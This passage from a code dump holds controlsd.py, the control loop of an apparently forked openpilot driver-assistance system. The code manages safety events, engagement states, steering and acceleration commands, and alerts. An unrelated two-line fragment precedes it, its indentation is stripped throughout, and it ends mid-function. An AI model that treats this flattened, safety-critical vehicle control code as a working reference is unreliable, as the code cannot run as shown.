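#   # `pdf` is a file-like object: a BytesIO for small outputs, or an open temp file otherwise.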
# Start the process early.
SOFFICE = SOffice()
|
controlsd.py
|
#!/usr/bin/env python3
import os
import math
import requests
import threading
from numbers import Number
from cereal import car, log
from common.numpy_fast import clip
from common.realtime import sec_since_boot, config_realtime_process, Priority, Ratekeeper, DT_CTRL
from common.profiler import Profiler
from common.params import Params, put_nonblocking
from common.travis_checker import gh_actions
import cereal.messaging as messaging
import selfdrive.crash as crash
from selfdrive.config import Conversions as CV
from selfdrive.version import is_fork_remote
from selfdrive.swaglog import cloudlog
from selfdrive.boardd.boardd import can_list_to_can_capnp
from selfdrive.car.car_helpers import get_car, get_startup_event, get_one_can
from selfdrive.controls.lib.drive_helpers import update_v_cruise, initialize_v_cruise
from selfdrive.controls.lib.drive_helpers import get_lag_adjusted_curvature
from selfdrive.controls.lib.longcontrol import LongControl
from selfdrive.controls.lib.latcontrol_pid import LatControlPID
from selfdrive.controls.lib.latcontrol_indi import LatControlINDI
from selfdrive.controls.lib.latcontrol_lqr import LatControlLQR
from selfdrive.controls.lib.latcontrol_model import LatControlModel
from selfdrive.controls.lib.latcontrol_angle import LatControlAngle
from selfdrive.controls.lib.events import Events, ET
from selfdrive.controls.lib.alertmanager import AlertManager, set_offroad_alert
from selfdrive.controls.lib.vehicle_model import VehicleModel
from selfdrive.locationd.calibrationd import Calibration
from selfdrive.hardware import HARDWARE, TICI, EON
from selfdrive.manager.process_config import managed_processes
from selfdrive.controls.lib.dynamic_follow.df_manager import dfManager
from common.op_params import opParams
SOFT_DISABLE_TIME = 3 # seconds
LDW_MIN_SPEED = 31 * CV.MPH_TO_MS
LANE_DEPARTURE_THRESHOLD = 0.1
STEER_ANGLE_SATURATION_TIMEOUT = 1.0 / DT_CTRL
STEER_ANGLE_SATURATION_THRESHOLD = 2.5 # Degrees
REPLAY = "REPLAY" in os.environ
SIMULATION = "SIMULATION" in os.environ
NOSENSOR = "NOSENSOR" in os.environ
IGNORE_PROCESSES = {"rtshield", "uploader", "deleter", "loggerd", "logmessaged", "tombstoned",
"logcatd", "proclogd", "clocksd", "updated", "timezoned", "manage_athenad"} | \
{k for k, v in managed_processes.items() if not v.enabled}
ACTUATOR_FIELDS = set(car.CarControl.Actuators.schema.fields.keys())
ThermalStatus = log.DeviceState.ThermalStatus
State = log.ControlsState.OpenpilotState
PandaType = log.PandaState.PandaType
Desire = log.LateralPlan.Desire
LaneChangeState = log.LateralPlan.LaneChangeState
LaneChangeDirection = log.LateralPlan.LaneChangeDirection
EventName = car.CarEvent.EventName
ButtonEvent = car.CarState.ButtonEvent
SafetyModel = car.CarParams.SafetyModel
IGNORED_SAFETY_MODES = [SafetyModel.silent, SafetyModel.noOutput]
def log_fingerprint(candidate, timeout=15):
if not gh_actions and is_fork_remote:
try:
requests.get('https://sentry.io', timeout=timeout)
crash.init()
crash.capture_message("fingerprinted {}".format(candidate), level='info')
return
except:
pass
class Controls:
def __init__(self, sm=None, pm=None, can_sock=None):
config_realtime_process(4 if TICI else 3, Priority.CTRL_HIGH)
self.op_params = opParams()
# Setup sockets
self.pm = pm
if self.pm is None:
self.pm = messaging.PubMaster(['sendcan', 'controlsState', 'carState',
'carControl', 'carEvents', 'carParams'])
self.camera_packets = ["roadCameraState", "driverCameraState"]
if TICI:
self.camera_packets.append("wideRoadCameraState")
params = Params()
self.joystick_mode = params.get_bool("JoystickDebugMode")
joystick_packet = ['testJoystick'] if self.joystick_mode else []
self.sm = sm
if self.sm is None:
ignore = ['driverCameraState', 'managerState'] if SIMULATION else None
self.sm = messaging.SubMaster(['deviceState', 'pandaStates', 'peripheralState', 'modelV2', 'liveCalibration',
'driverMonitoringState', 'longitudinalPlan', 'lateralPlan', 'liveLocationKalman',
'managerState', 'liveParameters', 'radarState'] + self.camera_packets + joystick_packet,
ignore_alive=ignore, ignore_avg_freq=['radarState', 'longitudinalPlan'])
self.sm_smiskol = messaging.SubMaster(['radarState', 'dynamicFollowData', 'liveTracks', 'dynamicFollowButton',
'laneSpeed', 'dynamicCameraOffset', 'modelLongButton'])
self.op_params = opParams()
self.df_manager = dfManager()
self.last_model_long = False
self.can_sock = can_sock
if can_sock is None:
can_timeout = None if os.environ.get('NO_CAN_TIMEOUT', False) else 100
self.can_sock = messaging.sub_sock('can', timeout=can_timeout)
if TICI:
self.log_sock = messaging.sub_sock('androidLog')
# wait for one pandaState and one CAN packet
print("Waiting for CAN messages...")
get_one_can(self.can_sock)
self.CI, self.CP, candidate = get_car(self.can_sock, self.pm.sock['sendcan'])
threading.Thread(target=log_fingerprint, args=[candidate]).start()
# read params
self.is_metric = params.get_bool("IsMetric")
self.is_ldw_enabled = params.get_bool("IsLdwEnabled")
community_feature_toggle = params.get_bool("CommunityFeaturesToggle")
openpilot_enabled_toggle = params.get_bool("OpenpilotEnabledToggle")
passive = params.get_bool("Passive") or not openpilot_enabled_toggle
# detect sound card presence and ensure successful init
sounds_available = HARDWARE.get_sound_card_online()
car_recognized = self.CP.carName != 'mock'
controller_available = self.CI.CC is not None and not passive and not self.CP.dashcamOnly
community_feature = self.CP.communityFeature or \
self.CP.fingerprintSource == car.CarParams.FingerprintSource.can
community_feature_disallowed = community_feature and (not community_feature_toggle)
self.read_only = not car_recognized or not controller_available or \
self.CP.dashcamOnly or community_feature_disallowed
if self.read_only:
safety_config = car.CarParams.SafetyConfig.new_message()
safety_config.safetyModel = car.CarParams.SafetyModel.noOutput
self.CP.safetyConfigs = [safety_config]
# Write CarParams for radard
cp_bytes = self.CP.to_bytes()
params.put("CarParams", cp_bytes)
put_nonblocking("CarParamsCache", cp_bytes)
self.CC = car.CarControl.new_message()
self.AM = AlertManager()
self.events = Events()
self.LoC = LongControl(self.CP)
self.VM = VehicleModel(self.CP)
if self.CP.steerControlType == car.CarParams.SteerControlType.angle:
self.LaC = LatControlAngle(self.CP)
elif self.CP.lateralTuning.which() == 'pid':
self.LaC = LatControlPID(self.CP, self.CI)
elif self.CP.lateralTuning.which() == 'indi':
self.LaC = LatControlINDI(self.CP)
elif self.CP.lateralTuning.which() == 'lqr':
self.LaC = LatControlLQR(self.CP)
elif self.CP.lateralTuning.which() == 'model':
self.LaC = LatControlModel(self.CP)
self.initialized = False
self.state = State.disabled
self.enabled = False
self.active = False
self.can_rcv_error = False
self.soft_disable_timer = 0
self.v_cruise_kph = 255
self.v_cruise_kph_last = 0
self.mismatch_counter = 0
self.cruise_mismatch_counter = 0
self.can_rcv_error_counter = 0
self.last_blinker_frame = 0
self.saturated_count = 0
self.distance_traveled = 0
self.last_functional_fan_frame = 0
self.events_prev = []
self.current_alert_types = [ET.PERMANENT]
self.logged_comm_issue = False
self.button_timers = {ButtonEvent.Type.decelCruise: 0, ButtonEvent.Type.accelCruise: 0}
self.last_actuators = car.CarControl.Actuators.new_message()
self.lat_delay_offset = 0.0
# TODO: no longer necessary, aside from process replay
self.sm['liveParameters'].valid = True
self.startup_event = get_startup_event(car_recognized, controller_available, len(self.CP.carFw) > 0, self.CP)
if not sounds_available:
self.events.add(EventName.soundsUnavailable, static=True)
if community_feature_disallowed and car_recognized and not self.CP.dashcamOnly:
self.events.add(EventName.communityFeatureDisallowed, static=True)
if not car_recognized:
self.events.add(EventName.carUnrecognized, static=True)
if len(self.CP.carFw) > 0:
set_offroad_alert("Offroad_CarUnrecognized", True)
else:
set_offroad_alert("Offroad_NoFirmware", True)
elif self.read_only:
self.events.add(EventName.dashcamMode, static=True)
elif self.joystick_mode:
self.events.add(EventName.joystickDebug, static=True)
self.startup_event = None
# controlsd is driven by can recv, expected at 100Hz
self.rk = Ratekeeper(100, print_delay_threshold=None)
self.prof = Profiler(False) # off by default
def update_events(self, CS):
"""Compute carEvents from carState"""
self.events.clear()
self.events.add_from_msg(CS.events)
self.events.add_from_msg(self.sm['driverMonitoringState'].events)
# Handle startup event
if self.startup_event is not None:
self.events.add(self.startup_event)
self.startup_event = None
# Don't add any more events if not initialized
if not self.initialized:
self.events.add(EventName.controlsInitializing)
return
# Create events for battery, temperature, disk space, and memory
if EON and (self.sm['peripheralState'].pandaType != PandaType.uno) and \
self.sm['deviceState'].batteryPercent < 1 and self.sm['deviceState'].chargingError:
# at zero percent battery, while discharging, OP should not be allowed
self.events.add(EventName.lowBattery)
if self.sm['deviceState'].thermalStatus >= ThermalStatus.red:
self.events.add(EventName.overheat)
if self.sm['deviceState'].freeSpacePercent < 7 and not SIMULATION:
# under 7% of space free no enable allowed
self.events.add(EventName.outOfSpace)
# TODO: make tici threshold the same
if self.sm['deviceState'].memoryUsagePercent > (90 if TICI else 65) and not SIMULATION:
self.events.add(EventName.lowMemory)
# TODO: enable this once loggerd CPU usage is more reasonable
#cpus = list(self.sm['deviceState'].cpuUsagePercent)[:(-1 if EON else None)]
#if max(cpus, default=0) > 95 and not SIMULATION:
# self.events.add(EventName.highCpuUsage)
# Alert if fan isn't spinning for 5 seconds
if self.sm['peripheralState'].pandaType in [PandaType.uno, PandaType.dos]:
if self.sm['peripheralState'].fanSpeedRpm == 0 and self.sm['deviceState'].fanSpeedPercentDesired > 50:
if (self.sm.frame - self.last_functional_fan_frame) * DT_CTRL > 5.0:
self.events.add(EventName.fanMalfunction)
else:
self.last_functional_fan_frame = self.sm.frame
# Handle calibration status
cal_status = self.sm['liveCalibration'].calStatus
if cal_status != Calibration.CALIBRATED:
if cal_status == Calibration.UNCALIBRATED:
self.events.add(EventName.calibrationIncomplete)
else:
self.events.add(EventName.calibrationInvalid)
# Handle lane change
if self.sm['lateralPlan'].laneChangeState == LaneChangeState.preLaneChange:
direction = self.sm['lateralPlan'].laneChangeDirection
if (CS.leftBlindspot and direction == LaneChangeDirection.left) or \
(CS.rightBlindspot and direction == LaneChangeDirection.right):
self.events.add(EventName.laneChangeBlocked)
else:
if direction == LaneChangeDirection.left:
self.events.add(EventName.preLaneChangeLeft)
else:
self.events.add(EventName.preLaneChangeRight)
elif self.sm['lateralPlan'].laneChangeState in [LaneChangeState.laneChangeStarting,
LaneChangeState.laneChangeFinishing]:
self.events.add(EventName.laneChange)
if not CS.canValid:
self.events.add(EventName.canError)
for i, pandaState in enumerate(self.sm['pandaStates']):
# All pandas must match the list of safetyConfigs, and if outside this list, must be silent or noOutput
if i < len(self.CP.safetyConfigs):
safety_mismatch = pandaState.safetyModel != self.CP.safetyConfigs[i].safetyModel or pandaState.safetyParam != self.CP.safetyConfigs[i].safetyParam
else:
safety_mismatch = pandaState.safetyModel not in IGNORED_SAFETY_MODES
if safety_mismatch or self.mismatch_counter >= 200:
self.events.add(EventName.controlsMismatch)
if log.PandaState.FaultType.relayMalfunction in pandaState.faults:
self.events.add(EventName.relayMalfunction)
# Check for HW or system issues
if len(self.sm['radarState'].radarErrors):
self.events.add(EventName.radarFault)
elif not self.sm.valid["pandaStates"]:
self.events.add(EventName.usbError)
elif not self.sm.all_alive_and_valid() or self.can_rcv_error:
self.events.add(EventName.commIssue)
if not self.logged_comm_issue:
invalid = [s for s, valid in self.sm.valid.items() if not valid]
not_alive = [s for s, alive in self.sm.alive.items() if not alive]
cloudlog.event("commIssue", invalid=invalid, not_alive=not_alive)
self.logged_comm_issue = True
else:
self.logged_comm_issue = False
if not self.sm['liveParameters'].valid:
self.events.add(EventName.vehicleModelInvalid)
if not self.sm['lateralPlan'].mpcSolutionValid:
self.events.add(EventName.plannerError)
if not self.sm['liveLocationKalman'].sensorsOK and not NOSENSOR:
if self.sm.frame > 5 / DT_CTRL: # Give locationd some time to receive all the inputs
self.events.add(EventName.sensorDataInvalid)
if not self.sm['liveLocationKalman'].posenetOK:
self.events.add(EventName.posenetInvalid)
if not self.sm['liveLocationKalman'].deviceStable:
self.events.add(EventName.deviceFalling)
if not REPLAY:
# Check for mismatch between openpilot and car's PCM
cruise_mismatch = CS.cruiseState.enabled and (not self.enabled or not self.CP.pcmCruise)
self.cruise_mismatch_counter = self.cruise_mismatch_counter + 1 if cruise_mismatch else 0
if self.cruise_mismatch_counter > int(3. / DT_CTRL):
self.events.add(EventName.cruiseMismatch)
# Check for FCW
stock_long_is_braking = self.enabled and not self.CP.openpilotLongitudinalControl and CS.aEgo < -1.5
model_fcw = self.sm['modelV2'].meta.hardBrakePredicted and not CS.brakePressed and not stock_long_is_braking
planner_fcw = self.sm['longitudinalPlan'].fcw and self.enabled
if planner_fcw or model_fcw:
self.events.add(EventName.fcw)
if TICI:
logs = messaging.drain_sock(self.log_sock, wait_for_one=False)
messages = []
for m in logs:
try:
messages.append(m.androidLog.message)
except UnicodeDecodeError:
pass
for err in ["ERROR_CRC", "ERROR_ECC", "ERROR_STREAM_UNDERFLOW", "APPLY FAILED"]:
for m in messages:
if err not in m:
continue
csid = m.split("CSID:")[-1].split(" ")[0]
evt = {"0": EventName.roadCameraError, "1": EventName.wideRoadCameraError,
"2": EventName.driverCameraError}.get(csid, None)
if evt is not None:
self.events.add(evt)
# TODO: fix simulator
if not SIMULATION:
if not NOSENSOR:
if not self.sm['liveLocationKalman'].gpsOK and (self.distance_traveled > 1000):
# Don't show in the first 1 km to allow for driving out of the garage. This event shows after 5 minutes
self.events.add(EventName.noGps)
if not self.sm.all_alive(self.camera_packets):
self.events.add(EventName.cameraMalfunction)
if self.sm['modelV2'].frameDropPerc > 20:
self.events.add(EventName.modeldLagging)
if self.sm['liveLocationKalman'].excessiveResets:
self.events.add(EventName.localizerMalfunction)
# Check if all manager processes are running
not_running = {p.name for p in self.sm['managerState'].processes if not p.running}
if self.sm.rcv_frame['managerState'] and (not_running - IGNORE_PROCESSES):
self.events.add(EventName.processNotRunning)
# Only allow engagement with brake pressed when stopped behind another stopped car
speeds = self.sm['longitudinalPlan'].speeds
if len(speeds) > 1:
v_future = speeds[-1]
else:
v_future = 100.0
if CS.brakePressed and v_future >= self.CP.vEgoStarting \
and self.CP.openpilotLongitudinalControl and CS.vEgo < 0.3 and not self.last_model_long:
self.events.add(EventName.noTarget)
self.add_stock_additions_alerts(CS)
def add_stock_additions_alerts(self, CS):
self.AM.SA_set_frame(self.sm.frame)
self.AM.SA_set_enabled(self.enabled)
# alert priority is defined by code location: keeping alerts are highest, then lane speed alerts, then auto-df alerts
if self.sm_smiskol['modelLongButton'].enabled != self.last_model_long:
extra_text_1 = 'disabled!' if self.last_model_long else 'enabled!'
extra_text_2 = '' if self.last_model_long else ', model may behave unexpectedly'
self.AM.SA_add('modelLongAlert', extra_text_1=extra_text_1, extra_text_2=extra_text_2)
return
if self.sm_smiskol['dynamicCameraOffset'].keepingLeft:
self.AM.SA_add('laneSpeedKeeping', extra_text_1='LEFT', extra_text_2='Oncoming traffic in right lane')
return
elif self.sm_smiskol['dynamicCameraOffset'].keepingRight:
self.AM.SA_add('laneSpeedKeeping', extra_text_1='RIGHT', extra_text_2='Oncoming traffic in left lane')
return
ls_state = self.sm_smiskol['laneSpeed'].state
if ls_state != '':
self.AM.SA_add('lsButtonAlert', extra_text_1=ls_state)
return
faster_lane = self.sm_smiskol['laneSpeed'].fastestLane
if faster_lane in ['left', 'right']:
ls_alert = 'laneSpeedAlert'
if not self.sm_smiskol['laneSpeed'].new:
ls_alert += 'Silent'
self.AM.SA_add(ls_alert, extra_text_1='{} lane faster'.format(faster_lane).upper(), extra_text_2='Change lanes to faster {} lane'.format(faster_lane))
return
df_out = self.df_manager.update()
if df_out.changed:
df_alert = 'dfButtonAlert'
if df_out.is_auto and df_out.last_is_auto:
# only show auto alert if engaged, not hiding auto, and time since lane speed alert not showing
if CS.cruiseState.enabled and not self.op_params.get('hide_auto_df_alerts'):
df_alert += 'Silent'
self.AM.SA_add(df_alert, extra_text_1=df_out.model_profile_text + ' (auto)')
return
elif self.op_params.get('df_button_alerts').strip().lower() == 'off':
return
else:
if self.op_params.get('df_button_alerts').strip().lower() == 'silent':
df_alert += 'Silent'
self.AM.SA_add(df_alert, extra_text_1=df_out.user_profile_text, extra_text_2='Dynamic follow: {} profile active'.format(df_out.user_profile_text))
return
def data_sample(self):
"""Receive data from sockets and update carState"""
# Update carState from CAN
can_strs = messaging.drain_sock_raw(self.can_sock, wait_for_one=True)
CS = self.CI.update(self.CC, can_strs)
self.sm.update(0)
self.sm_smiskol.update(0)
# all_valid = CS.canValid and self.sm.all_alive_and_valid()
if not self.initialized: # and (all_valid or self.sm.frame * DT_CTRL > 3.5 or SIMULATION):
if not self.read_only:
self.CI.init(self.CP, self.can_sock, self.pm.sock['sendcan'])
self.initialized = True
Params().put_bool("ControlsReady", True)
# Check for CAN timeout
if not can_strs:
self.can_rcv_error_counter += 1
self.can_rcv_error = True
else:
self.can_rcv_error = False
# When the panda and controlsd do not agree on controls_allowed
# we want to disengage openpilot. However the status from the panda goes through
# another socket other than the CAN messages and one can arrive earlier than the other.
# Therefore we allow a mismatch for two samples, then we trigger the disengagement.
if not self.enabled:
self.mismatch_counter = 0
# All pandas not in silent mode must have controlsAllowed when openpilot is enabled
if any(not ps.controlsAllowed and self.enabled for ps in self.sm['pandaStates']
if ps.safetyModel not in IGNORED_SAFETY_MODES):
self.mismatch_counter += 1
self.distance_traveled += CS.vEgo * DT_CTRL
return CS
def state_transition(self, CS):
"""Compute conditional state transitions and execute actions on state transitions"""
self.v_cruise_kph_last = self.v_cruise_kph
# if stock cruise is completely disabled, then we can use our own set speed logic
if not self.CP.pcmCruise:
self.v_cruise_kph = update_v_cruise(self.v_cruise_kph, CS.buttonEvents, self.button_timers, self.enabled, self.is_metric)
elif CS.cruiseState.enabled:
self.v_cruise_kph = CS.cruiseState.speed * CV.MS_TO_KPH
# decrement the soft disable timer at every step, as it's reset on
# entrance in SOFT_DISABLING state
self.soft_disable_timer = max(0, self.soft_disable_timer - 1)
self.current_alert_types = [ET.PERMANENT]
# ENABLED, PRE ENABLING, SOFT DISABLING
if self.state != State.disabled:
# user and immediate disable always have priority in a non-disabled state
if self.events.any(ET.USER_DISABLE):
self.state = State.disabled
self.current_alert_types.append(ET.USER_DISABLE)
elif self.events.any(ET.IMMEDIATE_DISABLE):
self.state = State.disabled
self.current_alert_types.append(ET.IMMEDIATE_DISABLE)
else:
# ENABLED
if self.state == State.enabled:
if self.events.any(ET.SOFT_DISABLE):
self.state = State.softDisabling
self.soft_disable_timer = int(SOFT_DISABLE_TIME / DT_CTRL)
self.current_alert_types.append(ET.SOFT_DISABLE)
# SOFT DISABLING
elif self.state == State.softDisabling:
if not self.events.any(ET.SOFT_DISABLE):
# no more soft disabling condition, so go back to ENABLED
self.state = State.enabled
elif self.events.any(ET.SOFT_DISABLE) and self.soft_disable_timer > 0:
self.current_alert_types.append(ET.SOFT_DISABLE)
elif self.soft_disable_timer <= 0:
self.state = State.disabled
# PRE ENABLING
elif self.state == State.preEnabled:
if not self.events.any(ET.PRE_ENABLE):
self.state = State.enabled
else:
self.current_alert_types.append(ET.PRE_ENABLE)
# DISABLED
elif self.state == State.disabled:
if self.events.any(ET.ENABLE):
if self.events.any(ET.NO_ENTRY):
self.current_alert_types.append(ET.NO_ENTRY)
else:
if self.events.any(ET.PRE_ENABLE):
self.state = State.preEnabled
else:
self.state = State.enabled
self.current_alert_types.append(ET.ENABLE)
self.v_cruise_kph = initialize_v_cruise(CS.vEgo, CS.buttonEvents, self.v_cruise_kph_last)
# Check if actuators are enabled
self.active = self.state == State.enabled or self.state == State.softDisabling
if self.active:
self.current_alert_types.append(ET.WARNING)
# Check if openpilot is engaged
self.enabled = self.active or self.state == State.preEnabled
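# Summary of the transitions implemented above (derived from the code, not an exhaustive spec):
#   disabled      -> preEnabled/enabled  on ENABLE (unless a NO_ENTRY event is present)
#   preEnabled    -> enabled             once no PRE_ENABLE events remain
#   enabled       -> softDisabling       on SOFT_DISABLE (timer set to SOFT_DISABLE_TIME)
#   softDisabling -> enabled             if the SOFT_DISABLE condition clears
#   softDisabling -> disabled            when the timer runs out
#   any state     -> disabled            on USER_DISABLE or IMMEDIATE_DISABLE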
def state_control(self, CS):
"""Given the state, this function returns an actuators packet"""
# Update VehicleModel
params = self.sm['liveParameters']
x = max(params.stiffnessFactor, 0.1)
sr = max(params.steerRatio, 0.1)
self.VM.update_params(x, sr)
lat_plan = self.sm['lateralPlan']
long_plan = self.sm['longitudinalPlan']
actuators = car.CarControl.Actuators.new_message()
actuators.longControlState = self.LoC.long_control_state
if CS.leftBlinker or CS.rightBlinker:
self.last_blinker_frame = self.sm.frame
# State specific actions
if not self.active:
self.LaC.reset()
self.LoC.reset(v_pid=CS.vEgo)
if not self.joystick_mode:
extras_loc = {'lead_one': self.sm_smiskol['radarState'].leadOne, 'mpc_TR': self.sm_smiskol['dynamicFollowData'].mpcTR, # TODO: just pass the services
'live_tracks': self.sm_smiskol['liveTracks'], 'has_lead': long_plan.hasLead}
# accel PID loop
pid_accel_limits = self.CI.get_pid_accel_limits(self.CP, CS.vEgo, self.v_cruise_kph * CV.KPH_TO_MS)
actuators.accel = self.LoC.update(self.active, CS, self.CP, long_plan, pid_accel_limits, extras_loc)
# interpolate lat plan to 100hz
self.lat_delay_offset += DT_CTRL
if self.sm.updated['lateralPlan']:
self.lat_delay_offset = 0.
# Steering PID loop and lateral MPC
lat_active = self.active and not CS.steerWarning and not CS.steerError and CS.vEgo > self.CP.minSteerSpeed
desired_curvature, desired_curvature_rate = get_lag_adjusted_curvature(self.CP, CS.vEgo,
lat_plan.psis,
lat_plan.curvatures,
lat_plan.curvatureRates,
self.lat_delay_offset)
actuators.steer, actuators.steeringAngleDeg, lac_log = self.LaC.update(lat_active, CS, self.CP, self.VM, params, self.last_actuators,
desired_curvature, desired_curvature_rate)
else:
lac_log = log.ControlsState.LateralDebugState.new_message()
if self.sm.rcv_frame['testJoystick'] > 0 and self.active:
actuators.accel = 4.0*clip(self.sm['testJoystick'].axes[0], -1, 1)
steer = clip(self.sm['testJoystick'].axes[1], -1, 1)
# max angle is 45 for angle-based cars
actuators.steer, actuators.steeringAngleDeg = steer, steer * 45.
lac_log.active = True
lac_log.steeringAngleDeg = CS.steeringAngleDeg
lac_log.output = steer
lac_log.saturated = abs(steer) >= 0.9
# Check for difference between desired angle and angle for angle based control
angle_control_saturated = self.CP.steerControlType == car.CarParams.SteerControlType.angle and \
abs(actuators.steeringAngleDeg - CS.steeringAngleDeg) > STEER_ANGLE_SATURATION_THRESHOLD
if angle_control_saturated and not CS.steeringPressed and self.active:
self.saturated_count += 1
else:
self.saturated_count = 0
# Send a "steering required alert" if saturation count has reached the limit
if (lac_log.saturated and not CS.steeringPressed) or \
(self.saturated_count > STEER_ANGLE_SATURATION_TIMEOUT):
if len(lat_plan.dPathPoints):
# Check if we deviated from the path
# TODO use desired vs actual curvature
left_deviation = actuators.steer > 0 and lat_plan.dPathPoints[0] < -0.20
right_deviation = actuators.steer < 0 and lat_plan.dPathPoints[0] > 0.20
if left_deviation or right_deviation:
self.events.add(EventName.steerSaturated)
# Ensure no NaNs/Infs
for p in ACTUATOR_FIELDS:
attr = getattr(actuators, p)
if not isinstance(attr, Number):
continue
if not math.isfinite(attr):
cloudlog.error(f"actuators.{p} not finite {actuators.to_dict()}")
setattr(actuators, p, 0.0)
return actuators, lac_log
def update_button_timers(self, buttonEvents):
# increment timer for buttons still pressed
for k in self.button_timers.keys():
if self.button_timers[k] > 0:
self.button_timers[k] += 1
for b in buttonEvents:
if b.type.raw in self.button_timers:
self.button_timers[b.type.raw] = 1 if b.pressed else 0
def publish_logs(self, CS, start_time, actuators, lac_log):
"""Send actuators and hud commands to the car, send controlsstate and MPC logging"""
CC = car.CarControl.new_message()
CC.enabled = self.enabled
CC.active = self.active
CC.actuators = actuators
orientation_value = self.sm['liveLocationKalman'].orientationNED.value
if len(orientation_value) > 2:
CC.roll = orientation_value[0]
CC.pitch = orientation_value[1]
CC.cruiseControl.cancel = CS.cruiseState.enabled and (not self.enabled or not self.CP.pcmCruise)
if self.joystick_mode and self.sm.rcv_frame['testJoystick'] > 0 and self.sm['testJoystick'].buttons[0]:
CC.cruiseControl.cancel = True
hudControl = CC.hudControl
hudControl.setSpeed = float(self.v_cruise_kph * CV.KPH_TO_MS)
hudControl.speedVisible = self.enabled
hudControl.lanesVisible = self.enabled
hudControl.leadVisible = self.sm['longitudinalPlan'].hasLead
hudControl.rightLaneVisible = True
hudControl.leftLaneVisible = True
recent_blinker = (self.sm.frame - self.last_blinker_frame) * DT_CTRL < 5.0 # 5s blinker cooldown
ldw_allowed = self.is_ldw_enabled and CS.vEgo > LDW_MIN_SPEED and not recent_blinker \
and not self.active and self.sm['liveCalibration'].calStatus == Calibration.CALIBRATED
model_v2 = self.sm['modelV2']
desire_prediction = model_v2.meta.desirePrediction
if len(desire_prediction) and ldw_allowed:
right_lane_visible = self.sm['lateralPlan'].rProb > 0.5
left_lane_visible = self.sm['lateralPlan'].lProb > 0.5
l_lane_change_prob = desire_prediction[Desire.laneChangeLeft - 1]
r_lane_change_prob = desire_prediction[Desire.laneChangeRight - 1]
lane_lines = model_v2.laneLines
CAMERA_OFFSET = self.sm['lateralPlan'].cameraOffset
l_lane_close = left_lane_visible and (lane_lines[1].y[0] > -(1.08 + CAMERA_OFFSET))
r_lane_close = right_lane_visible and (lane_lines[2].y[0] < (1.08 - CAMERA_OFFSET))
hudControl.leftLaneDepart = bool(l_lane_change_prob > LANE_DEPARTURE_THRESHOLD and l_lane_close)
hudControl.rightLaneDepart = bool(r_lane_change_prob > LANE_DEPARTURE_THRESHOLD and r_lane_close)
if hudControl.rightLaneDepart or hudControl.leftLaneDepart:
self.events.add(EventName.ldw)
clear_event = ET.WARNING if ET.WARNING not in self.current_alert_types else None
alerts = self.events.create_alerts(self.current_alert_types, [self.CP, self.sm, self.is_metric, self.soft_disable_timer])
self.AM.add_many(self.sm.frame, alerts)
current_alert = self.AM.process_alerts(self.sm.frame, clear_event)
if current_alert:
hudControl.visualAlert = current_alert.visual_alert
self.last_model_long = self.sm_smiskol['modelLongButton'].enabled
if not self.read_only and self.initialized:
# send car controls over can
self.last_actuators, can_sends = self.CI.apply(CC)
self.pm.send('sendcan', can_list_to_can_capnp(can_sends, msgtype='sendcan', valid=CS.canValid))
CC.actuatorsOutput = self.last_actuators
force_decel = (self.sm['driverMonitoringState'].awarenessStatus < 0.) or \
(self.state == State.softDisabling)
# Curvature & Steering angle
params = self.sm['liveParameters']
steer_angle_without_offset = math.radians(CS.steeringAngleDeg - params.angleOffsetDeg)
curvature = -self.VM.calc_curvature(steer_angle_without_offset, CS.vEgo, params.roll)
# controlsState
dat = messaging.new_message('controlsState')
dat.valid = CS.canValid
controlsState = dat.controlsState
if current_alert:
controlsState.alertText1 = current_alert.alert_text_1
controlsState.alertText2 = current_alert.alert_text_2
controlsState.alertSize = current_alert.alert_size
controlsState.alertStatus = current_alert.alert_status
controlsState.alertBlinkingRate = current_alert.alert_rate
controlsState.alertType = current_alert.alert_type
controlsState.alertSound = current_alert.audible_alert
controlsState.canMonoTimes = list(CS.canMonoTimes)
controlsState.longitudinalPlanMonoTime = self.sm.logMonoTime['longitudinalPlan']
controlsState.lateralPlanMonoTime = self.sm.logMonoTime['lateralPlan']
controlsState.enabled = self.enabled
controlsState.active = self.active
controlsState.curvature = curvature
controlsState.state = self.state
controlsState.engageable = not self.events.any(ET.NO_ENTRY)
controlsState.longControlState = self.LoC.long_control_state
controlsState.vPid = float(self.LoC.v_pid)
controlsState.vCruise = float(self.v_cruise_kph)
controlsState.upAccelCmd = float(self.LoC.pid.p)
controlsState.uiAccelCmd = float(self.LoC.pid.i)
controlsState.ufAccelCmd = float(self.LoC.pid.f)
controlsState.cumLagMs = -self.rk.remaining * 1000.
controlsState.startMonoTime = int(start_time * 1e9)
controlsState.forceDecel = bool(force_decel)
controlsState.canErrorCounter = self.can_rcv_error_counter
lat_tuning = self.CP.lateralTuning.which()
if self.joystick_mode:
controlsState.lateralControlState.debugState = lac_log
elif self.CP.steerControlType == car.CarParams.SteerControlType.angle:
controlsState.lateralControlState.angleState = lac_log
elif lat_tuning == 'pid':
controlsState.lateralControlState.pidState = lac_log
elif lat_tuning == 'lqr':
controlsState.lateralControlState.lqrState = lac_log
elif lat_tuning == 'indi':
controlsState.lateralControlState.indiState = lac_log
elif lat_tuning == 'model':
controlsState.lateralControlState.modelState = lac_log
self.pm.send('controlsState', dat)
# carState
car_events = self.events.to_msg()
cs_send = messaging.new_message('carState')
cs_send.valid = CS.canValid
cs_send.carState = CS
cs_send.carState.events = car_events
self.pm.send('carState', cs_send)
# carEvents - logged every second or on change
if (self.sm.frame % int(1. / DT_CTRL) == 0) or (self.events.names != self.events_prev):
ce_send = messaging.new_message('carEvents', len(self.events))
ce_send.carEvents = car_events
self.pm.send('carEvents', ce_send)
self.events_prev = self.events.names.copy()
# carParams - logged every 50 seconds (> 1 per segment)
if (self.sm.frame % int(50. / DT_CTRL) == 0):
cp_send = messaging.new_message('carParams')
cp_send.carParams = self.CP
self.pm.send('carParams', cp_send)
# carControl
cc_send = messaging.new_message('carControl')
cc_send.valid = CS.canValid
cc_send.carControl = CC
self.pm.send('carControl', cc_send)
# copy CarControl to pass to CarInterface on the next iteration
self.CC = CC
def step(self):
start_time = sec_since_boot()
self.prof.checkpoint("Ratekeeper", ignore=True)
# Sample data from sockets and get a carState
CS = self.data_sample()
self.prof.checkpoint("Sample")
self.update_events(CS)
if not self.read_only and self.initialized:
# Update control state
self.state_transition(CS)
self.prof.checkpoint("State transition")
# Compute actuators (runs PID loops and lateral MPC)
actuators, lac_log = self.state_control(CS)
self.prof.checkpoint("State Control")
# Publish data
self.publish_logs(CS, start_time, actuators, lac_log)
self.prof.checkpoint("Sent")
self.update_button_timers(CS.buttonEvents)
def controlsd_thread(self):
while True:
self.step()
self.rk.monitor_time()
self.prof.display()
def main(sm=None, pm=None, logcan=None):
controls = Controls(sm, pm, logcan)
